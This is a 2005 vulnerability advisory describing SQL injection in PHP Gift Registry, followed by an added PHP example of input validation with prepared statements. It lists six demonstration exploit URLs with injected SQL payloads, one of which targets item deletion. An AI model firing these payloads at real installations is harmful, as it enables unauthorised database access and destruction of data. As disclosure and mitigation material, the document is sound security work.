| PHP Gift Registry Parameter Input Validation Hole Lets Remote Users Inject SQL Commands |
|---|
Category: Vulnerability Posted: 2005-01-18 by ReCall
| Details |
|---|
Description: Madelman reported an input validation vulnerability in PHP Gift Registry (phpGiftReg). A remote user can inject SQL commands.
The script does not properly validate user-supplied input. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database.
Some demonstration exploit URLs are provided:
http://[target]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1
http://[target]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1
http://[target]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1
http://[target]/phpgiftreg/index.php?action=request&shopfor=3%2c0%29%2c%2899%2c100
http://[target]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1
http://[target]/phpgiftreg/item.php?action=delete&itemid=3%20OR%201%3d1
Other parameters and functions may also be affected.
Impact: A remote user can execute SQL commands on the underlying database.
Solution: No solution was available at the time of this entry.
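Mitigation example (added here; it is not phpGiftReg's code and not part of the original advisory): the PHP below shows how strict integer validation plus a bound placeholder rejects the decoded values from the URLs above. The `messages` table, its columns, the function names and the use of PDO with an in-memory SQLite database are assumptions for illustration.

```php
<?php
declare(strict_types=1);
// Added illustration, not phpGiftReg source. The messages table, its columns
// and both function names are hypothetical.

// Return the named request parameter as a positive integer, or throw.
function require_id(array $query, string $name): int
{
    // FILTER_VALIDATE_INT fails on "2 OR 1=1", "3,0),(99,100" and on arrays.
    $id = filter_var($query[$name] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException("rejected non-integer $name");
    }
    return $id;
}

// Hardened form. The pattern to replace is string-built SQL such as
//   "UPDATE messages SET isread = 1 WHERE messageid = $messageid"
// where the value "2 OR 1=1" widens the WHERE clause to every row.
function ack_message(PDO $db, int $messageId): int
{
    $stmt = $db->prepare('UPDATE messages SET isread = 1 WHERE messageid = ?');
    $stmt->execute([$messageId]);   // value is bound, never parsed as SQL
    return $stmt->rowCount();
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE messages (messageid INTEGER PRIMARY KEY, isread INTEGER DEFAULT 0)');
$db->exec('INSERT INTO messages (messageid) VALUES (1), (2), (3)');

// Two query strings from the advisory's URLs, plus one well-formed request.
$requests = [
    'action=ack&messageid=2%20OR%201%3d1',
    'action=request&shopfor=3%2c0%29%2c%2899%2c100',
    'action=ack&messageid=2',
];
foreach ($requests as $qs) {
    parse_str($qs, $query);          // URL-decodes values, as PHP does for $_GET
    $name = isset($query['messageid']) ? 'messageid' : 'shopfor';
    try {
        $id = require_id($query, $name);
        echo "$name=$id accepted, rows updated: ", ack_message($db, $id), "\n";
    } catch (InvalidArgumentException $e) {
        echo $e->getMessage(), ' (', $query[$name], ")\n";
    }
}
```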